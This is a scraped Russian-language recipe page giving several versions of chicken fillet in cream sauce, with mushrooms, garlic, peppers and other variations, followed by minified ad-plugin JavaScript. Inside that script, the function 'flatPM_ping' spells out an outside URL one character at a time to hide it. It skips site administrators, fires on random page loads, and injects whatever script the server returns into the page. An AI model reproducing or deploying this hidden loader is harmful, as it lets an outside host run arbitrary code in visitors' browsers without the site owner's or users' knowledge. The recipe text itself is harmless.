Куриное филе в сливочном соусе

Филе куриное в сливочном соусе на сковороде

Вкусное и сытное блюдо для повседневного меню! Простое куриное филе можно с легкостью превратить в изумительное и изысканное блюдо. Диетическим, конечно, его не назовешь, но и к тяжелой пище его отнести нельзя. Нравится это блюдо абсолютно всем, без исключения – и взрослым, и детям.

  1. Главная
  2. Лучшие рецепты
  3. Категории рецепта
  4. Филе куриное в сливочном соусе на сковороде

Ингредиенты и как готовить

ингредиенты на 4 порции или – количество продуктов для нужных вам порций будет подсчитано автоматически!’>

Всего:

Вес состава: 100 гр
Калорийность
состава:
139 ккал
Белков: 12 гр
Жиров: 7 гр
Углеводов: 4 гр
Б/Ж/У: 52 / 31 / 17
Н 75 / С 0 / В 25

Время приготовления: 40 мин

Пошаговое приготовление

Шаг 1:

Куриное филе помойте и хорошо обсушите бумажным полотенцем. Каждое куриное филе нарежьте на 3 порционных куска.

Шаг 2:

Разогрейте сковороду. Налейте на неё немного растительного масла. Обжарьте куски куриного филе на сильном огне по 2-3 минуты с каждой стороны.

Шаг 3:

Пока филе жарится очистите репчатый лук и мелко его нарежьте.

Шаг 4:

Когда из куриного филе выделится сок добавьте нарезанный лук. Мясо немного подсолите и посыпьте сухими специями. Накройте сковороду крышкой, сделайте немного меньше огонь и готовьте так минут 10-15. Не забывайте периодически помешивать.

Шаг 5:

Пока мясо тушится подготовьте следующие ингредиенты. В одной кружке подготовьте сливки. В другой кружке растворите муку в холодной воде. Чеснок очистите и измельчите.

Шаг 6:

Добавьте к мясу сливки, муку с водой и измельченный чеснок. Все хорошо прогрейте, доведя массу до кипения. При нагревании, получившийся соус, начнет становиться гуще. Если, на ваш взгляд, соус получается густой, то добавьте немного воды. Куриное филе в ароматном сливочном соусе готово! Приятного аппетита!

Это блюдо готовится достаточно быстро, поэтому пользуется огромной популярностью среди многих хозяек. Куриное филе в таком ароматном соусе отлично подойдет к любому гарниру. Но, с другой стороны, оно очень гармонично само по себе, поэтому вполне можно подать как самостоятельную закуску к любому застолью.
Чтобы филе было сочным, обязательно его обжарьте на сильном огне. При этом мясо, как бы, запечатывается и все соки остаются внутри куска.
В качестве сухих специи рекомендую использовать сушеные петрушку и укроп. Никаких острых вкусов и ароматов добавлять не надо, чтобы не перебивать основной вкус.
При подаче можно каждую порцию дополнительно посыпать свежей зеленью. Но это уже, исключительно, по своему вкусу.
От такого блюда еще никто никогда не отказывался. Попробуйте и вы!

Куриное филе с грибами в сливочном соусе

Описание

Куриное филе – белое мясо, которому отдают предпочтение многие. И я одна из них. Куриное филе у меня в морозилке никогда не заканчивается. И не то, что я фанатка белого мяса. У меня просто дома спортсмен – старший сын, которому нужно употреблять много белка. Да и готовить из куриного филе одно удовольствие. Мясо неприхотливое: без прожилок, без сала, быстро готовится и съедается без остатков.

Еще один большой плюс этого мяса, так это разнообразие блюд. Куриное филе жарят, тушат, запекают, фаршируют.

Сегодня предлагаю приготовить куриное филе в сливочном соусе, с добавлением белых грибов шампиньонов. Обычно я готовлю сливочный соус из сметаны, но сегодня решила пустить в ход сливки. И ни капельки не пожалела.

К такому сливочному соусу нужно приготовить гарнир. Он подайдет любой: макароны, любая крупа, картофель. Но вот в этот раз гарнир не понадобился, так как весь мясной соус съели, не дождавшись гарнира. Скушали на одном дыхании с овощами, да с хлебушком!

Ингредиенты:

Как приготовить:

Осмелюсь сказать, что куриное филе в сливочном соусе у меня всегда быстрый обед или ужин. Вся семья любит сочетание мяса и грибов. А в таком нежном сливочном соусе, как его не любить?

Читать еще:  Печеночный торт рецепт

Первым делом куриное филе нарезаем (поперек волокон) не очень крупно, но и не мелко, солим, перчим и добавляем любимые травки.

В сковороду налить пару ложек раст. масла и отправить в него приправленное мясо.

Как пожарить куриное филе на сковороде, чтоб не пересушить его? Куриное филе само по себе сухое мясо и, если неправильно жарить, его можно запросто пересушить. Чтоб этого избежать давайте посмотрим, как пожарить куриное филе на сковороде, чтоб оно получилось сочным внутри.

Для начала нужно как следует разогреть сковороду с раст. маслом. Затем отправить мясо в раскаленное масло и жарить на большом огне, периодически его перемешивая. От высокой температуры мясо покрывается корочкой, сохраняя сок внутри. Но долго не стоит увлекаться- несколько минут и готово.

Прожаренное куриное филе осторожно перекладываем на тарелку, при помощи шумовки. А жирок и масло, которое осталось в сковороде от филе не выливаем. Сейчас мы будем за 3 минуты обжаривать грибы.

Шампиньоны моем тщательно, удаляя грязь и нарезаем ломтиками.

Отправляем в сковороду грибы и по необходимости доливаем ложку масла.

Грибы я жарю буквально 2 -3 минуты, постоянно помешивая. Сразу солю и немного перчу. Когда они немного уменьшатся в объеме, я добавляю муку.

Перемешав грибы с мукой, я вливаю сливки. Кстати, сливки у меня домашние. Чем жирнее сливки, тем гуще получится соус.

Доводим сливочный соус до загустения и кипятим одну, две минуты. Если соус густоватый получается, добавьте молока или воды.

Затем присоединяем куриное филе и измельченный чеснок. Если желаете, добавьте и лист лаврового листа. Я про него просто забыла. Но он никак не помешает в этом блюде, а наоборот сделает вкус более нарядным!

Перемешиваем сливочный соус, накрываем сковороду крышкой и на самом маленьком огне тушим куриное филе с грибами около 5-7 минут. Почти в самом конце тушения добавляем зелень. Идеальный вариант – это укроп.

После отключения огня дайте сливочному соусу постоять на плите несколько минут и можно будет звать всех кушать. Я, как вы понимаете, не успела своих позвать, они с вилками были уже на готове. Еле тарелку забрала, чтоб сделать фото!

Друзья, я вам желаю приятного аппетита и до новых встреч!

Куриное филе со сливками на сковороде

Привет, foodkrot! Вы когда-нибудь готовили курицу в сливках? Если нет, то обязательно решитесь на это блюдо. Невероятно нежное и вкусное, при всей своей простоте, а уж аромат какой стоит. Отлично подходит для праздничного стола.

Вариаций приготовления несколько, можете выбрать любой из рецептов. Либо сконструировать свой.

Как вкусно приготовить куриное филе в сливочном соусе

– куриная грудка 1 шт. (куриное филе 300гр.);
– репчатый лук 1 шт.;
– сливки 20% 300 мл.;
– крахмал 1 ч.л.;
– соль, чёрный перец;
– укроп, базилик.

1. Берём луковицу и чистим её от шелухи, моем от загрязнений и кухонным ножом режем на кубики.

2. Ставим на газ сковородку, наливаем в неё подсолнечного масла, или используем кусочек сливочного.

3. В разогретой сковороде обжариваем лук на среднем огне до мягкости и полупрозрачности.

4. Размораживаем курицу, или используем охлажденную, споласкиваем холодной водой под краном, убираем лишнюю влагу салфеткой.

5. На разделочной доске режем куриное филе на кусочки, кубики или брусочки. Со стороной 1,5-2 см. Выкладываем к луку на сковороду и обжариваем минут 5 до белого цвета.

6. Посолить, приправить перцем. Можно добавить пару щепоток мускатного ореха. Измельчаем укроп и базилик, отправляем в сковороду.

7. Вливаем сливки, добавляем крахмал, чтобы загустить сливочный соус.

8. Курицу в сливках накрываем крышкой, чуть убавляем огонь и тушим минут 10-15 на сковороде, раз в 5 минут помешивая.

Получаем вкуснотищу, которая отлично дополнит любой гарнир. Но лучше всего подходит ко всем видам макаронных изделий, рису и картофелю. Но если Вы не любитель молочного, то кисло-сладкий терияки это то, что надо!

Куриное филе со сливками на сковороде

В этом рецепте специи употребляют до обжаривания, а крахмал заменили мукой

– куриное филе 300 гр.;
– репчатый лук 1 шт.;
– сливки 30% 300мл.;
– мука 1-2 ст.л.;
– розмарин.

1. Курицу подготавливаем: размораживание, промывание, обтирание. И нарезаем небольшими кусочками. Кожу для этого лучше не использовать.

2. Складываем в глубокую тарелку, натираем перцем и готовой приправой для курицы (если лень заморачиваться), но она может содержать соль. А солить курицу в сливках желательно позже. Посыпаем сушёной или свежей зеленью, перемешиваем и оставляем минут на 10.

3. В это время займитесь луком. Почистите его от шелухи, сполосните под краном и разрежьте на 4 части. Нашинкуйте соломкой.

4. На сильном огне разогрейте сковороду, с подсолнечным маслом и закиньте лук. убавьте огонь до среднего и пассируйте до мягкости. Обычно на это уходит минут 5.

5. Лук можно временно переложить, или готовить с курицей в отдельных сковородках.

6. Обваливаем каждый кусочек курицы в муке. И обжариваем на сковороде в небольшом количестве масла до образования корочки 3-4 минуты с двух сторон. В большой сковороде это сделать удобней, а утолщенное дно обеспечит равномерный нагрев.

7. Когда корочка образовалась можно объединить с лучком, посолить, добавить приправ (если на ваш взгляд их недостаточно) и залить сливками.

Перемешиваем, ждём начала бурления.

8. Убавляем огонь, перемешиваем, оставляем тушиться под закрытой крышкой. 10-15 минут.

Мука добавляет сливочному соусу густоты. Наслаждайтесь вкусным и нежным мясом с подливкой из сливок.

Курица в сливочно-чесночном соусе на сковороде

– куриные грудки (филе) 400 гр.;
– лук репка 1 шт.;
– сливочное масло 30 гр.;
– сливки 20% 1 стакан;
– чеснок 3 зубчика;
– соль 0.5 ч.л.;
– горчица 1 ч.л.;
– черный перец молотый 0.25 ч.л.;
– карри 0.5 ч.л.

1. Подготовленную курицу нарезаем кубиками.

2. Луковицу очищаем, мелко режем кубиками.

3. Зубчики чеснока чистим от шелухи, измельчаем.

4. На среднем огне прогреваем сковороду, отправляем на неё кусочек сливочного масла и растапливаем его.

5. Обжариваем лук с чесноком в течение 5 минут до золотистого цвета, периодически помешивая.

6. После чего выкладываем туда же курицу, обжариваем до тех пор пока мясо не побелеет (корочка вряд ли получится).

7. Соль, карри, горчицу, чёрный перец и зелень нужно смешать со сливками. Если делать это миксером или блендером, то можно и чеснок туда бросить.

8. Выливаем ароматную смесь к (не менее ароматной) курочке и тушим на малом огне 15 минут.

В конце приготовления попробуйте, хватает ли соли и приправ. По необходимости добавляйте.

Куриное филе можно посолить во время обжаривания (в конце), а не добавлять в сливки.

Кушайте с отварными крупами, вермишелью и другими нейтральными гарнирами.

Как можно приготовить курицу в сливках

В любой из рецептов можно внести коррективы, чуть чуть изменить состав, приукрасить вкус и аромат.

Не обязательно делать это блюдо со сливками, их спокойно заменяют молоком, но в этом случае придется загустить соус мукой или крахмалом. Не менее вкусно получается со сметаной, особенно если дополнить её грибами.

Добавление овощей сделает блюдо ярче и сытнее (о пользе, вообще молчу). Это могут быть: помидоры, цветная капуста, кабачок. Помимо лука, моркови, болгарского перца и чеснока.

Самые интересные специи, какие только можно добавить — мускатный орех, корица, карри, имбирь, куркума. Только не добавляйте все сразу.

Зеленый лук, укроп, петрушка и базилик, а так же смеси — прованские или итальянские травы.

Желаю всем невероятного наслаждения от нежного сливочного куриного филе!

Видео с моего youtube-канала Самодельная Еда:

Куриное филе в сливочном соусе – волшебная нежность!

Блюда из курицы – это рецепты-спасатели: они разнообразны, большинство из них готовится легко и быстро, ингредиенты заменяемы, и если какого-либо не оказалось, подключив фантазию, можно создать новый шедевр.

Куриное филе в сливочном соусе с болгарским перцем

Рекомендуется малышам с трех лет и представляет собой лучшее (по мнению диетологов) сочетание основного блюда с гарниром – мясо и овощи. Куриное филе в сливочном соусе получается очень нежным за счет томления в сливках и понравится и взрослым, и детям. Итак, необходимые продукты: куриное филе (лучше грудка) – 2 шт., болгарский перец (лучше красный – готовое блюдо выглядит аппетитнее, ярче) – 2 шт., репчатый лук – 1шт., сливки -150 мл, соль – по вкусу, сливочное масло – немного, для обжарки, листья салата – несколько штук (необязательная составляющая – на них выкладывается куриное филе в сливочном соусе с перцем для подачи на стол).

  1. Куриное филе порезать на кусочки, подсолить, быстро обжарить на сливочном масле.
  2. Перец очистить от семян, порезать небольшими кусочками.
  3. Лук очистить, порезать на кусочки желаемого размера или полукольцами.
  4. Выложить мясо, лук и перец в посуду для запекания, посолить, перемешать и влить сливки. Накрыть сверху фольгой или крышкой и поставить в разогретую духовку минут на 30.
  5. Подавать на листьях салата, при желании можно дополнить гарниром.

Рецепт для тех, кто любит остренькое

Куриное филе в сливочном соусе с чесноком и перцем великолепно сочетается с макаронами или любой кашей. Ингредиенты: филе куриное – 2 шт., куриный бульон или вода – 200 мл, сметана или сливки – 100 мл, чеснок – по вкусу, шампиньоны – 100 г, томаты – 1 шт., майонез и специи (для маринада).

  1. Порезать куриное филе кубиками, смешать с майонезом и специями, оставить минут на 15.
  2. Шампиньоны порезать, с томата снять кожицу и тоже нашинковать.
  3. Быстро обжарить мясо на небольшом количестве масла в течение 10 минут.
  4. Добавить грибы, жарить минут 5-10. Затем помидоры – и готовить еще 5 минут.
  5. Влить бульон, тушить 10-15 минут. В это время чеснок порезать, смешать со сметаной, а затем влить на сковороду. Помешивая, довести до кипения, но не кипятить. Оставить куриное филе в сливочном соусе томиться под крышкой на очень маленьком огне минут на 10.

Курица в кунжуте

Куриное филе в соевом соусе тает во рту, вкус мяса уникален, а кунжут создает хрустящую корочку. Ингредиенты: филе – 2 шт., яйцо – 3 шт., кунжут – 150-200 г, соевый соус, мука.

  1. Филе порезать на полоски шириной 2 см, замариновать в соусе желательно на час. Но если времени на готовку немного, то хватит и 10-15 минут.
  2. Яйца взбить, высыпать по отдельным тарелкам кунжут и муку.
  3. Обваливать куриные полоски сначала в муке, затем обмакивать в яйцо, потом – в кунжут и отправлять на сковороду с разогретым растительным маслом. Обжаривать нужно с обеих сторон на небольшом огне, чтобы кунжут не подгорал.

Рецепт можно изменить, например, добавить к яйцу тертый сыр или чеснок, а готовить не на плите, а в духовке. Как вариант, при мариновании мяса добавить имбирь, который придаст пикантности и остроты. Но, вне зависимости от вариаций, куриное филе в соусе никогда не получится суховатым. Приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};